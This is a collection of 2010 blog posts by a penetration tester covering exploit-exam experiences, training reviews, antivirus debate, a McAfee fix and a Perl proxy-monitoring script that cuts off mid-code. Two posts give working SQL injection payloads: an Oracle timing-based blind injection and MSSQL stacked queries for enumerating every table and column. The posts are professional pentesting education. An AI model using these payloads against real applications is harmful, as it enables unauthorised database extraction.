So that brings us back to the Linux exploit. I don't know who wrote the c code that they provide you, but I can tell you this: He is a bastard. They tell you that you can do either the remote buffer overflow or the format string. So, not wanting all the various headaches that format string attacks can bring, I tried the stack overflow first. The vulnerable function in this case is not your standard simple buffer overflowable function. The buffers are both declared at the beginning of int main, and are then passed to the vulnerable function as pointers. This means that you can't overwrite the return pointer of the 'vulnerable function'. Instead you are overflowing towards int main's return pointer. In of itself, this is not a problem. The problem comes in the stack layout for int main. Between the vuln buffer and the saved return pointer is the declaration of a socket file descriptor. This file descriptor has a value of 7, or 0x00000007 . Do you see the problem here? The socket itself is essentially acting as a stack canary. Because what happens is the control loop won't exit until it has read specific input off the socket. so if we overflow the socket fd, it goes to eprform a recv() call on a file descriptor that does not exist, returning an error, which does NOT break the control loop. The result, we never get our terminator input read from the socket, but it will keep going back and trying to read from a socket that it doesn't know where it is anymore. We end up in an endless loop. There is surely someway to beat this scenario. I don't think the IACRB would make that a 'trick question', but I'll be damned if i could figure out how to bypass that bit of nastiness.

So, after lots and lots of wasted time looking at the stack, i moved on to trying the format string. I had some trouble here that was due to my own lack of familiarity with a certain mechanism they use. It is a common c mechanism, so I have little excuse, i just didn't know much about how it operated on the stack. Once I figured that out there were a few tricks I had to use because of the nature of the program itself. There is a lot of backwards-forward flip-flop thinking involved here, but if you can keep your data flow straight in your head you'll do fine. If not, do what i did, use a lot of sheets of scrap paper. At one point during this, i wrote down every variable and it's offset just so I could visually see where everything was on the stack at a glance. This is very important. You are going to want to become intimately aware of where everything is on the stack and how it got there, it will make your life easier. The final challenge was then taking the exploit and pulling it together into a single cohesive exploit with no manual processes. This was of course a job for Perl, and my favourite language performed admirably with just a tiny bit of help from C(I decided to quickly write a statically compiled binary to do one little piece for me. I didn't know how to dot hat part in perl, and so I just fudged it a little bit with C, sue me.) My time to completion: ~ 3 weeks!

All things considered, I found the CEPT Practical Exam to be one of the most worthwhile things I've done. It is by far the best, most relevant, and most rewarding certification I've ever gone after.

Finally, I have to thank Infosec Institute. I had some not so great things to say about the first half of their 2 week course. However, the second half of the course was very good. The instructor in the online videos seemed very competent, and was good at getting ideas across. The labs were, for the most part, well done. It did a fairly good job of preparing me for the CEPT cert, but certainly didn't give you all the answers in advance. Also, the staff at Infosec Institute are great people and very helpful. There were a few complications that arose during the course of ordering, receiving and doing the training. Minh Nguyen and Steve Drabik over there could not have been more helpful in getting these issues sorted out. They were also very patient with the man who kept annoying them every other week ;) . i am already looking at their Expert Penetration Testing: Writing Windows Exploits and their Reverse Engineering classes for the future. Although I am worried about repeating material, especially since Infosec Institute does come with a rather high price tag.

My advice to anyone in the industry who is itnerested in developing these skills more, would be to take the "Advanced Ethical Hacking" course and the CEPT cert. If nothing else, it will be fun.

Projects Worthy of Praise: Hackers Unite

2010-09-21T14:14:00.000-07:00

It has been a while since i have last posted. I come to bring you news of two different projects. I am very excited about both of these. The first one is one I am actually involved in directly: A Hackerspace in Charlotte North Carolina. This idea sort of got kicked off by one of my coworkers, who started investigating it after visiting Nullspace Labs in LA. He asked if I was interested, and soon after we began investigating potential spaces.

We had our first meetup last week, and to our surprise 25 people showed up to it. The reaction was astoundingly positive. We have a good assortment of software and hardware hackers. We have developers, pentesters, robotics people etc. Everyone there seemed genuinely committed to the idea. Our next meeting is tonight, although I am going to have to miss this one. So if you live in the greater Charlotte area and are interested in participating, please come check us out.

The other project I wanted to mention is being done by Schuyler Towne. He is attempting to start his own lockpick business, and has used kickstarter to try and raise initial funds. He had a goal of about $6,000, and has so far raised over $68,000. Depending on your donation level you will receive some absolutely fabulous prizes including custom lockpicks, practice locks, templates, and more. If you are at all interested in the sport or science of picking locks, do yourself a favour and get on board with this. It is an amazing deal, and people like this deserve community support anyways. There are only 71 hours left to get onboard as a backer!

Infosec Institute Advanced Ethical Hacking

2010-07-26T10:32:00.000-07:00

A while ago I made a post about Infosec Institute's 10 Day Penetration Testing Course . I had some not so great things to say about the first half of the course. I think, in retrospect, the first week would be good for someone just starting out in the field to get their feet wet. There are some things I definitely think I would change, to bring it more in line with that concept, but it's hard for me to judge since I was already outside of that target audience. I have finally had the time to delve into the second week of the training course. This portion of the course focuses on the real meat and potatoes of penetration testing and exploiting. There is still some tool-centric material at the beginning, but the course jumps pretty quickly into the good stuff. It starts covering program memory structure, and how buffer overflows really work. Pretty soon you find yourself writing basic shellcode, and doing memory analysis to perform true exploits.

There are ties back to tools, but mostly in how they can make your life easier. Everything this part f the course covers is done manually before they show you how to use a tool. In my opinion, this is exactly what they should be doing. I do not have an assembly background so some of this is valuable information I have been missing so far. From buffer overflows it moves on to format strings and heap overflows. There are sections on on fuzzing, fault injection and more that I have not gotten to yet. I hope to be finishing up the course in the next few days.

There are some benefits to the online version of this course, such as being able to set your own pace. That being said, I think this particular course would be worth paying the extra money for the classroom experience. These are much more complicated topics than the first week, and if you don't already have experience in assembly and memory structure you may find yourself wanting to ask questions that you will have to answer all on your own. There is nothing wrong with this, of course, but I personally prefer active discussion to simply reading things online.

All in all, my impression of the second half of this training is very different from the first. Anyone who has experience with penetration testing, but wants to delve into the real heart of the subject should take a course like this.

Moving on and Moving Up

2010-07-25T11:43:00.000-07:00

The inevitable has happened. I am leaving my current job, and moving on to a new company. I am very excited about this new opportunity. The company I am going to work for seems like a great place to work. However, this will be the first time my family has moved to a location where we don't know anybody. We will have no friends and no family there. This is the part of this field that isn't so great. Jobs tend to crop up in very specific places, and you have to be ready to pick up and move in order to not lose a great opportunity. It was a hard decision to sacrifice all the personal reasons to stay in favour of all the professional reasons to move. We have family, and friends here that we love very much. We like this area after being here only two years. My children will no longer be able to see their grandparents so often. However I will be moving to a larger, more mature company, in a great area. The team I will be working with is full of very bright people who take this work very seriously. Even more importantly, the members of my new team know lots of things I don't. I will be working to learn a lot from them, and that is something I am eager to start doing.

Robert Khoo over at Penny Arcade said something in one of their tv episodes, that has stuck with me since. He told a potential employee "To be successful at something, to be like the best of breed at something, means you make sacrifices.I would say nine times out of ten, that means your social life, and that is how you get amazing at something." I think that this is extremely true. Nobody ever got to be the best at something by putting in the same amount of effort as everyone else. You get to be the best by putting in more effort than everyone else, and working as hard as you possibly can. I don't know if I can ever be the best at what I do, but I won't stop trying until I am. I have a long way to go before I can be the next RSnake, lcamtuf, or Tavis Ormandy. The best part of being in this field is that those very people I wish to be better than, will help me along the way. It may not be in a big way, but each of those three people have helped me grow already. Each of them have even taken the time to reply to emails and blogposts. These are people who will honestly share ideas and knowledge. That, more than anything else, is what makes this field great. So look out guys, one day soon you may be reading a white paper with my name on it. In the meantime I just want to say thank you to all of you, as well as Mark Russinovich over at Microsoft, for taking time out of busy lives to answer a few stupid questions from somebody you've never heard of...yet.

Tavis Ormandy's Full Disclosure: Just the facts ma'am

2010-06-26T12:12:00.000-07:00

Everybody has been talking about Tavis Ormandy's disclosure of a Windows Help Centre Vulnerability. There has been very heated debate going around. In some cases the word debate is a little generous. There has been a lot of name calling, mud slinging, and general ad hominem nonesense. People are trashing Tavis, Microsoft, and even Robert Hansen now. It's gotten a little out of hand. What I have noticed is a lack of real substantiated facts in these arguments. To that end, I have made an effort to contact both involved parties, Tavis Ormandy, and the MSRC. I am hoping that they will be willing to respond with some of the facts surrounding this occurrence., and maybe we'll hear a little bit of tempered truth, instead of everyone's emotionally charged bickering. Of course, the chances that either Tavis or the MSRC will be bothered to respond to me are probably not great, here's hoping.

UPDATE: I have heard back from Mr. Ormandy. He was very polite but has stated that he would prefer to let the issue rest than answer anymore questions. Since I am unable to present his side of the argument, even if I were to hear comment back from Microsoft, I would feel it impossible to present an unbiased view here. therefore I shall just let it drop. Perhaps that is really what we all just need to do. If you think he was right, then silently cheer him on, if you think he was wrong admit that maybe he made a mistake, and move on.

Oracle Blind SQL Injection : Timing Based Attack using Heavy Queries

2010-06-23T10:56:00.000-07:00

This is a neat little trick my mate and I just learned about while testing an Oracle based application with a blind SQL Injection vector in it. It is not new by any means, nor did we discover it. Check out the defcon presentation that gave us the starting point, here. Conventional wisdom would have you believe that you cannot do timing based blind sqli against oracle, since there's no waitfor delay. What we have done is unioned in a query that, when true initiates a secondary 'heavy' query to the database. What we mean by heavy is that it tries to pull a lot of data, purposely slowing down the response time. Let's take a look at our example:

NULL UNION ALL SELECT SOME_FIELD_1 AS COL1, SOME_FIELD_2 AS COL2,((CASE WHEN EXISTS(SELECT SOME_FIELD_3 FROM SOME_TABLE_2 WHERE 0>(select count(*) from all_users t1, all_users t2,all_users t3,all_users t4) AND 1=1) THEN 'own' ELSE 'pwn' END)) as COL3 FROM SOME_TABLE_1,SOME_TABLE_2 ,DUAL WHERE --

This shows us a true example which should trigger based on the 1=1. So for this query we will see a noticeable delay over the same query with 1=1 replaced by 1=2. that tells us that a true condition will take much longer to reply now. So all we have to do is replace the simple 1=1/1=2 structure with our own test parameters. This is where you get into inserting your counts,lengths, and ascii(substr portions and slowly and methodically enumerate out every last bit of data in the system. This is a great technique to sue when other Blind Injection techniques fail.

SQL Injection Tip of the Day: Table and Column enumeration in a single row

2010-06-07T11:58:00.000-07:00

I will be getting around to putting together a comprehensive cheat sheet for sql injection. In the meantime, I figured I would release bits and pieces that I have found particularly useful. Today I want to talk about getting database schema metadata from Microsoft SQL Server 2005 and 2008(the technique may be slightly different for 2000).

This assumes you already have a sql inejction vector that allows serialisation of queries and union queries, and that the db user has create rights, although it can be modified to use update/insert into existing tables instead. So let's say you have found a sql injection vulnerability, but it will only return one row of results. That makes it an exceptionally arduous task to enumerate all the tables and their columns, one at a time. You can concatenate rows very easily, but you can't use concatenation against columns. This is where arrays come in to save the day. The first step is to inject a string like this:

';CREATE TABLE CT1 (tablenames VARCHAR(8000));DECLARE @tablens varchar(7999); SELECT @tablens=COALESCE(@tablens+';' , '') + name from dbo.sysobjects where xtype='U'; INSERT INTO CT1(tablenames) Select @tablens;--

Remember to encode as needed. This creates a new table called CT1 with a max size varchar as it's only column. It then creates an array called tablens, and selects the entire name column from dbo.sysobjects where the object is a user table. Finally it inserts the array in semicolon delimited format into our newly created table.

Then we just do something silly like:
' UNION Select tablenames,@@rowcount,@@servername,1,2,3,4,5 from CT1;DELETE from CT1;--

This of course returns the results, and clears the table out from behind us. We should now have all of the tablenames in this database. Using that we use the same attack vector, just slightly tweaked:

';DECLARE @tablens varchar(7999); SELECT @tablens=COALESCE(@tablens+',' , '') + name from syscolumns where id=object_id('Table1'); INSERT INTO CT1(tablenames) Select @tablens;--
and
' UNION Select tablenames,@@rowcount,@@servername,1,2,3,4,5 from CT1;DELETE from CT1;--

Now what I did, after making sure it worked, was to create a quick perl script. This perlscript took the list of tablenames, and custom generated the above attack strings for each table and put them into a text file. I then loaded this file into Burp Intruder as a custom payload, and let it run. Burp has enumerated almost all of the tables in a couple of minutes(this db had over 100 tables). Then it's just a matter of dumping all the results somewhere and pouring over it. Using this method, you can go from your proven sql injection vector to a map of the whole database in a very short amount of time.

And as ever, this showcases why Burpsuite Pro is a tester's best tool. How I ever worked without it is a mystery.

Training courses - Nerd steroids

2010-05-27T11:41:00.000-07:00

A few years ago when I was trying to break free of the more mundane trappings of IT, I decided to take some certifications. I began with compTIA and took my Network+ and Security+ exams. Imagine my surprise when these certification exams took me no more than 15 minutes apiece to ACE. They were so easy it became embarrassing to tell people that i had bothered to take them. I have considered many times going for my CCNA and CCSP but never gotten around to it. I am now in the process of taking a 10day course from infosecinstitute. This course is actually comprised of two courses jammed together into a single bootcamp. I am doing the online version of the course, unable to get my company to buy in for the additional costs of actually attending a physical class. these courses are centered around the CEH, CPT, and CEPT certifications. I am not very far into the first week of material and I am starting to get that sinking feeling again.

I don't want to bad mouth infosecinstitute and it's training...at least not yet. However, the entire first day was essential an introduction into using vmware and linux. They do this because they want to be able to cater to people who might not have experience in those areas. My question is, what are such people doing taking courses on pentesting? If you don't know how to set up a VM, or how to kill a process in linux, you've got a long way to before you can be a pentester, and it is going to take a lot longer than two weeks. This is where the steroid analogy comes in. People seem to approach these classes as a quick fix, rather like steroids. "If I take this class, i will learn to be a 1337 h4x0r".

DarkNet has a post about training courses right now too. In it he talks about how the CEH is pathetic(I am inclined to agree so far) and then talks about a few other courses/certs. Frankly speaking, these look much the same as every other one I've looked at. They seem tantalizing at first, then you realize it's the same recap bullshit and you learn nothing new.

Let's give up on steroids guys, and start thinking about some workout regimens. I want to see training courses out there that say outright "If you don't know what the different kinds of vulnerabilities are, or if you don't know how to find SQL injection, xss etc...don't take this class" Let's have some classes that start with "So you know how to find some vulnerabilities, let's talk about advanced techniques, and things you never thought to try before". Let's talk about how you maximize your extraction from a SQL injection, or what things work in Oracle or in MSSQL, or U2, or Sybase etc. Let's talk about some advanced encoding tricks, and how to pack javascript to get around filters. Let's talk about writing shellcode to try and exploit in a buffer overflow.

I am tired of having to rehash the same crap over and over again. Then I read what things RSnake or someone else is up to. I stop and think "hrm, what are they doing differently than me. What do they do better than me. Why?" I want to see training courses that answer those questions. I want something that says "okay, you're a pentester. now let me show you how the big boys do it"

Anyways, that is my rant for the day. Stay tuned as I am going to be working on putting together a bit of a SQL Injection cheat sheet in the coming weeks. I hope to have something comparable to RSnake's XSS cheat sheet and a lot better than the other ones I've seen.

Pakistan and the cyber-jihad?

2010-05-24T15:16:00.000-07:00

Wow, I have been out of touch with current events and have been playing catch up a little. I just read about Pakistan's own ISP PieNet taking down youtube. Apparently there has been a big battle of wills between the Pakistani government and sites like youtube, facebook, and our own beloved blogger.com. Well the Pakistani government mandated that these sites be blocked. So PieNet decided to send out BGP announcements for youtube, redirecting traffic to themselves....brilliant. aside from the stupidity of this approach( as they slammed themselves with all of the youtube traffic and then got cutoff by their upstream provider) this is pretty amazing. I am not aware of anything quite like this incident happening before.

An actual legitimate ISP has blatantly and purposefully launched a denial of service attack on one of the biggest sites on the Internet, over their views on censorship. They are basically committing an act of cyberwarefare in the closest sense that the term can be applied. Cyberwarfare, in my opinion, can't really be a part of true physical conflict. It is exactly this kind of scenario, a war of ideas. Pakistan's policy has become one of attacking the largest and easiest providers of free expression to the masses. A lot of these countries have always censored heavily, and done horrible things to keep the truth hidden. This is the first time i can think of where they do it on a global scale though. What happens if we see this behaviour continue? What are the large scale implications for the internet as a whole? There's some heavy stuff going on here. I will need more time to digest it all. In the meantime, what does everybody else think?

Stored Procedures do not necessarily prevent SQL Injection

2010-05-24T12:12:00.000-07:00

It seems that a lot of people think that just because an application uses stored procedures, it's queries must be safe. This absolutely false. Stored Procedures do not inherently add security, as they can be put together as poorly as any dynamically built query. I saw a perfect example of this the other day. An application took inputs, passed them to a stored procedures which then built a sql query by concatenating the inputs with predefined query strings. It then called sp_executesql to execute the dynamic query. The developer obviously had heard that stored procedures were safer than dynamic queries, so they went and made an SP, but they had their SP build a dynamic query. So all they succeeded in doing was pushing the problem back into the database layer instead of the app itself.

So testers and developers, please do not assume that an sp means safe. you still have to properly parameterize your queries and validate input and output. Security and shortcuts do not go together. If you think you may have vulnerable SPs like this, try running a query such as SELECT object_Name(id) FROM syscomments WHERE UPPER(text) LIKE '%SP_EXECUTESQL%' OR UPPER(text) LIKE '%EXECUTE%' OR UPPER(text) LIKE '%EXEC%'

to try and see where these venerabilities are.

Return postage for Mr Zalewski

2010-05-19T12:30:00.000-07:00

All due respect to Michal Zalewski. He is, after all, a very smart man. Much smarter than me, I'd wager. That being said, I disagree with some of his recent Zero Day Threat Post blog, Postcards from the anti-virus world . go ahead and read it, if you haven't already. Go ahead, I'll wait for you.....okay done? The most glaring problem is in the logic fail around the first bullet points. Hey says that most users are not keeping their anti-virus up to date. He then claims this is to the average AV user's advantage because malware writers don't bother to write AV evasion. First of all, this seems a bit specious to me, but let's continue on to the real problem here. In the first sub-point of the second item, he says that malware authours punt their malware so fast and so widespread there will be signature updates for it quickly, and this is good.

So excuse me, Mr Zalewski, but people don't update their AV with the latest signatures, but it's okay because they push out new signatures really fast? These two points of logic can in fact work together, as strange as it seems. The problem is that, in this scenario, the user base that is all good, has been marginalized to a fraction of the total user base. So what is really being said here is not that AV blacklisting methodology works really well, but rather that the fundamental failure of this approach for the majority constitutes a success for a minority of the users. So if you are a home user, who keeps his antivirus up to date you are better off than a home user who doesn't, or a corporation that does or does not.

Now let's talk about the second failure of this thinking. Mr Zalewski is thinking in the immediate. Even if the current trend continues on for N iterative cycles, the AV users do not win. The reason for this is simple: Blacklist methodology is not sustainable where N has grown to a large enough number in relation to the resource capacity of the machine running it. Antivirus has always been a resource hog, and has only gotten worse with time. the reason for this is the escalation factor. The 'bad guys' keep coming up with new malware, new techniques, new exploits etc. So the AV firms come out with new signatures, new heuristics, and new scan engines. With every cycle, the product becomes less manageable from a resource perspective. I have had consultants tell me that 'most major companies' do not run AV products on production servers, because it is too resource intensive.

There is also the manageability of the program itself. Remember that AV is code just like any other program, and not some magical box. It's prone to bugs big and small, like any other code. The more you mess with the code, the more the chance of introducing NEW bugs into it. As the complexity increases so do the odds of deviation from expected behaviour. i'm sure that smarter people than me have expressed this mathematically, but I don't know where such a formula resides. So as the N described above continues to increase so do the odds that we will see something like the Mcafee DAT 5958 bug. This factor alone takes a bite out of the security of an AV solution, because security will constantly be fighting operational needs for resources, and every time we have a bug like DAT 5958 or the Symantec Y2k10 bug, the rest of IT hates AV more.

Now let's get back to the bit about most malware authours not using AV evasion. now, I am not Dancho Danchev or any other malware researcher. Remember i'm just some schmuck penetration tester. That being said, I find it hard to believe this statement is entirely true. What I would be more inclined to believe is that there are now an abundance of skiddies out there using malware 'kits' to assemble tons of variant malware and distributing it. These people, of course, have no idea how to create evasion techniques and so they don't bother. They just cherry-pick. I would hazard a guess that a lot of the people really spending time on writing their malicious code, spend the time on at least some basic AV evasion.

Whether that's true or not, evasion is somewhat unnecessary. Mr. Zalewski hints at this as well in his article. He says that they don't bother because people don't update their anti-virus, so they don't worry about signature updates. This is just a demonstration of the utter failing of blacklist methodology. The malware authours don't need to write evasion techniques, because if a signature doesn't exist, and the heuristics won't catch it, what's the point? They can release their code into the wild now, then create a new variant when the AV companies get a sig out. They can play this game for quite a while. Tools like virustotal even give them a running scorecard of how they are doing against all the major players. Relying on signatures leaves holes you could drive trucks through. Those trucks, by the way, happen to be hauling your private data away to China and Russia.

Now please don't get me wrong here. I am not trying to call foul on the AV companies. At least not in any particular fashion. The thing of it is, if you are an MNC that got hit by a worm that exfiltrated trade secrets, and then F-Secure releases a signature a little later, that doesn't help much. It's rather like someone breaking into your house and stealing all of your stuff. the cops catch the crook, but may not get your stuff back. you don't blame the cop, but you do wish they had caught the guy while he was trying to break in, not after the fact.

As always, discussion and opinions are always welcome here.

NetSparker Community Edition Review

2010-04-23T10:06:00.000-07:00

For those of you who do not follow DarkNET , it is a well run blog where they add their perspective on security news and events. They also post a never ending stream of new tools and updates. They area great resource for keeping up to date on the latests toys and tools. They have come through for me once again by introducing me to Netsparker Community Edition. The last fire and forget web scanner I was enticed to check out in this manner was a horrible flop. It was called Acunetix, perhaps you've heard of it? If you haven't don't bother, it's rubbish.

So as you can imagine I was not expecting great things from Netsparker. However, as I was downloading it I noticed that RSnake had also posted about it. Like many people in my field, I tend to have an ego, but when RSnake speaks, I listen. So I installed the community edition and gave it some quick run through. As expected, many of the best features are turned off in the freebie version, but that's okay. They left enough good stuff in there to whet my appetite(good job marketing guys). So here are the things I noticed right off the bat:

The User Interface is very simple and straight forward. This is usually my first indication of a problem. In my experience, good products in this space tend to have absolutely wretched interfaces. they are tormented things that will try to bend your mind to it's will and subjugate you completely. The interface here is so simple most anyone could walk through setting up a scan.
The User Interface makes sense. Acunetix is a perfect example of the simplistic but terrible User Interface. It is very simple, but anything but straightforward. Trying to understand how to make it do some of the things you'd like it to do is not an easy task. Netsparker does not suffer these issues. It presents you with almost everything you could possibly need and even more importantly, nothing you don't.
The sucker is FAST. I typically use IBM's Rational Appscan product. While AppScan is a good product, fast is never an adjective I would use to describe it. Netsparker is fast. Now part of why it is so fast is because the test profile is so limited in the community edition. So let's just look at the crawler. A 964 url page took appscan just over an hour to crawl. NetSparker did it in 15 minutes. It then ran all of it's tests in another 20-30 minutes. It may be that we will see these speeds drop dramatically with the full version, due to the expanded test profile.
SQLi right away. One of the apps I tested it on had SQL Injection right on the login page. AppScan had failed to detect it, but manual testing revealed it inside 10 minutes. Netsparker caught it immediately. While this is far from a comprehensive look at it's detection rates, I say bravo to netsparker.
Thoroughness. This is hard to gauge because it is the limited version. It FEELS like it is not very thorough. Part of this is psychological, because it runs so fast. Part of it is because it doesn't find some things because it is the 'community edition'. I can't shake the feeling that it is not being thorough, but I would really have to test the full version to make any honest assessment of this.
No False positives, sorta. I performed several test scenarios, and it did not really generate false positives. The ambiguous language here is due to what I think is a very neat feature. On one of the test sites I saw a distinction in the results between 'we know there is cross-site scripting' and 'we think there might be'. I appreciate that it is extremely difficult to eliminate false positives, and I think this approach is great.
Testing framework. I have talked about this before, and I will talk about it again. We need to see testing harnesses, not just pas scanners. Once you are done with the scan, in Netsparker, it has tools you can use within the app to attempt to exploit the vulnerabilities. If you find a possible SQLi there is an actual injection tool built into the scanner to allow you to try and exploit it. It has similar tools for LFI and Command Injection. This, to my mind, represents the absolute right direction for these types of products to be heading in.
Pricetag. The community edition is free but limited. They then have two unlocked versions. The standard and enterprise edition. the key difference being the number of sites licensed for. I'm not sure if this means you predefine what sites you are licensed for or what. However, the unlimited Enterprise Edition comes with a pricetag of only $3000, which is extremely reasonable in my opinion. It also makes the product worthwhile even as a second scanner. I am considering recommending we purchase an Enterprise license so that we can have two scanners to see if we catch anything with one that we don't with the other.

So let me summarize briefly. The Community Edition of Netsparker shows some very significant promise. It would seem to indicate a well thought out and well developed product. However, for professional assessments I would definitely recommend you not try to use the Community Edition. Without having tested the Enterprise Edition, I won't recommend it out of hand, but at a pricetag of only $3000, it seems like a good idea.

Netsparker Community edition is created by Mavituna Security, and can be downloaded here.

Mcafee 5958 Dat issue fix Update

2010-04-21T15:57:00.000-07:00

Okay, so in my previous post I recommended copying the svchost.exe binary from the servicepackfiles\i386 directory. While in most cases this should work fine, there is still a possibility of version issues doing this. The better solution(although somewhat more tedious) would be to load the extra.dat file, and then go into the virusscan console, unlock it, and release svchost.exe from the quarantine. This should give you back the exact svchost binary that was removed before. I don't know if there's anyway to script releasing from quarantine, so that makes this somewhat less favourable of a solution from a wide scale deployment standpoint. However, this does guarantee that you'll get the EXACT same binary back that you lost. I've heard that Ford in particular is having an issue due to some special svchost binary they were using in their image. Because the version didn't match when they did the fix, it supposedly preventing the os from booting properly. For most people, either way will work fine, I just have to advise caution. I don't want somebody getting mad at me later because the fix I posted 'didn't work'.

This is another reason why I don't think it'd be a good idea for me to post the binary we created for the fix. It is using the specific svchost binary from our standard image and may not be right for everyone. Thanks to everyone who's been commenting/discussing here. I like seeing people helping each other out.

UPDATE: I thought this went without saying, but I'll make sure I mention it anyways. Please make sure to also add the extra.dat to your epo repositories. At this point, with 5959 out it probably is a moot point, but better safe than sorry.

Mcafee DAT 5958 Fix

2010-04-21T12:02:00.000-07:00

As many people are already aware, McAfee released DAT 5958 today. This DAT contained a fault, which caused issues in hosts running Windows XP SP3. The fault led to a false detection of the W32/Wecorl.A worm, which was an MS08-067 based worm. This resulted in McAfee nuking svchost.exe killing all win32 services on the machine. This results in a laundry list of problems. The way to fix machines impacted by this is simple:

1. Boot the machine into safe mode
2. Take the extra.dat file mcafee is providing and load it into c:\program files\common files\mcafee\engine
3. Copy svchost.exe from c:\windows\servicepackfiles\i386\svchost.exe to c:\windows\system32\svchost.exe and c:\windows\system32\dllcache\svchost.exe
4. Reboot

This should remove the faulty signature and replace the damaged svchost from the the servicepack files. This test has been tested and works within our company. We have rolled it into a quick exe package for ease of use.

Who can you trust?

2010-03-09T11:41:00.000-08:00

So by now, everybody has heard about the whole energizer DUO. Couple that with the news that vodafone shipped out some Android phones with Windows malware loaded on them. If you haven't ehard about this bit yet, I recommend reading here and here . The Zdnet post is especially nice because it include links to posts about other incidents just like this. You just have to ignore the linux vs windows flamewar, which I'm sorry to say I let myself get dragged into the middle of. I think it's a shame that the post devolved into that when there's a serious security concern brewing here. It has nothing to do with OSes are or even software. It has to do with trust.

We spend a lot of time talking about trust in the security world. "Don't download software from an untrusted source", "don't open emails from people you don't trust", "Don't plug untrusted usb devices into your computer." Then we get very condescending when people fail to obey these simple tenants of trust. What do we do when the trust betrays us though. These two most recent examples show cases where the users had every right to trust the infection vector. They downloaded software directly from energizer's site, why wouldn't it be safe? I just bought this phone, it's brand new. How could it possibly have malware on it? The phone example would be exactly the same as if you went to a store like staples, bought a thumb drive. Opened that horrid plastic bubble packaging, insert it in your computer, and then your antivirus starts setting off alarms like a 1940's air raid siren. The device was brand new, had not been tampered with in the store as far as you could tell, and came from a trusted source.

So now what if we take our hypothetical situation one step further. What if the malware isn't recognized by your AV. Now we have an infected computer. Your friend brings his usb drive over a couple days later to copy some files. It's his usb drive, he knows where it's been. He knows your a smart guy, so your computer should be safe. He takes the infected drive home, and now infects his machine. The cycle is obvious of course. Yes, of course these hypothetical people should have autorun turned off, we all know that by now, and so this example is not perfect. The issue is the trust factor though. In these situations, there is no "blame it on the user". They had every reason to trust these sources. It seems like the only answer is "don't trust anyone or anything". I'd love to see people's thoughts on this.

This is just sad

2010-03-08T08:27:00.000-08:00

So I was taking a poke at a friend's server, doing a preliminary sweep for them. I noticed that they were running filezilla 0.9.33 and so I did a quick google search for "filezilla 0.9.33 vuln". What I came up with scared me a little bit. It wasn't that I found some huge gaping vulnerability, but rather a level of ignorance from one of filezilla's forum admins that was simply astounding. Yuo can see the forum thread here , and find the CVE for the vulnerability being discussed here. The vulnerability that is being discussed is an information disclosure with the getcwd() function.

The site admin, botg, replies "What is FTP getcwd()? There's no such thing". Botg seems to think that this posting is about misuse of an ftp protocol command. He is then presented, by another user, with the CVE for this vulnerability. He then replies "Thank you, I know how to use Google. Doesn't change the fact that there's no such thing as FTP getcwd(), whatever that means". This is the statement, that more than anything else, blows me away.

In the scan results the original user posted it says

Details: The FTP daemon exhibits a descriptor leak in the getcwd (get current working directory) function.
Extra info: None.
Fix: Upgrade your libc C library to the current version.

And in botg's reply, he even includes the function brackets when referring to getcwd. Funny botg, that sure looks like a programming function call, now doesn't it? His snarky reply even sews the seeds of his own demise. "I know how to use google". Oh really? Let me help you out . As the first link describes the C function getcwd() I would say you seem to have some problems using google after all. I would also say, that you obviously have no understanding of how software vulnerabilities happen. If you think that vulnerabilities happen by some command the user can just type in and "hack the gibson", you need to stop watching TV mate. "It's not my job to know these things" you might say. No, but you are in the position of helping users, and this one came to you with a question. Rather than doing any decent amount of research, you opened your mouth and inserted your foot. Let's forget the whole Google bit, or the fact that it is immediately obvious that this is a C function call. I once again point you to the scan results the user posted:

Fix: Upgrade your libc C library to the current version.

Hrm, I wonder if that might provide a clue as to what's going on here? If this is the level of support a filezilla user can expect, I feel very sorry for them.

Update: I decided to register for their forums, so i could post some useful advice to this thread. I would take the high road, instead of just sitting back and being snarky myself. Imagine my surprise when my confirmation email comes in to activate my account, and my username and password are both on it in plaintext...uggggg. These people make me want to cry!

Monitoring those NTLM authentication Proxies

2010-03-05T13:48:00.000-08:00

So, now that we have discussed how to overcome the challenge of testing those NTLM proxies, we move on to a better use. Load testing is fine and good, but how often do you really need to load test. Let's say though, that you have a couple dozen of these proxies spread out all over the globe, and for some reason MOM just doesn't cut it with monitoring the actual request performance on these proxies.

Using the base design of the previous script, I created one that is set to test each proxy in the environment once, through the same URL, and measure the delay in response. This is not 100% accurate as internal networking issues can cause some unaccounted fluctuation, but it is good enough for general purposes. So I created a mysql database with two tables. One is a status table, which contains the proxy, a counter, and the current known status. This is especially useful as the script pulls the proxies to test from this table, so adding or removing proxies is just a matter of doing it in the database, instead of altering code. the other table is a simple log file.

The script times the delay in the final response from the initiation of the request and then assigns a status based on this result. It compares it to the current status listed for that proxy, if it is different, it updates the table and emails out an alert. If it continues in a persistent bad state, it will send out a new alert again on the 12 straight return of that bad status. This ensures we are notified that the status is persisting, but doesn't flood us every 10 minutes, which is how frequently the script runs. Anyways, without further ado, here is my simplistic little proxy monitoring script

----------------code--------------------

#!/usr/bin/perl -w
use threads;
use DBI;
use LWP;
use LWP::UserAgent;
use HTTP::Request;
use Authen::NTLM(nt_hash, lm_hash);
use Authen::NTLM::HTTP;
use Time::HiRes qw( gettimeofday );
use Math::Round;
use Net::SMTP;

#Opens the connection to the datbase and prepares the statement handles we will need to call on.
our $dbh = DBI->connect("DBI:mysql:Proxy_Health", , ) or die "Unable to connect to database $DBI::errstr";
our $statuschk = $dbh->prepare("SELECT * from status WHERE proxy=?");
our $statusupd = $dbh->prepare("UPDATE status SET status=? , count=? where proxy=?");
our $logsth=$dbh->prepare("INSERT INTO chklog(proxy,delay) VALUES(?,?)");

#pulls the lsit of proxies from the datbase and maps them to a hash
%proxies= map {$_ => 0 } @{ $dbh->selectcol_arrayref("Select proxy from status" )};

#generates a worker thread for each proxy to test
my $threadcount = 0;
foreach (keys %proxies){
$threadcount+=1;
$thrs[$threadcount]= threads->create(\&Test, $_);

}
#performs blcoking for the threads, and returns the result of each test and inserts them into the chklog table
foreach (keys %proxies){
$proxies{$_}= $thrs[$threadcount]->join;
$proxy_human = $_ ;
$proxy_human=~s/http:\/\///;
$proxy_human=~s/:80//;
$logsth->execute($proxy_human, $proxies{$_});
$threadcount-=1;
}

#Takes the results, and comapres the current status of the proxy to the last recorded status of the proxy. If the status has changed, it updates the status table and sends an alert. If the status has remained the same but is in a negative state, it increments a counter. Every 12 checks that return that negative result will generate a new Alert.
foreach (keys %proxies){
my $scount = 0;
if ($proxies{$_}>= 120){ $status = 'DOWN';}
elsif ($proxies{$_}>= 90){ $status = 'CRITICAL';}
elsif ($proxies{$_}>= 60){ $status = 'MAJOR';}
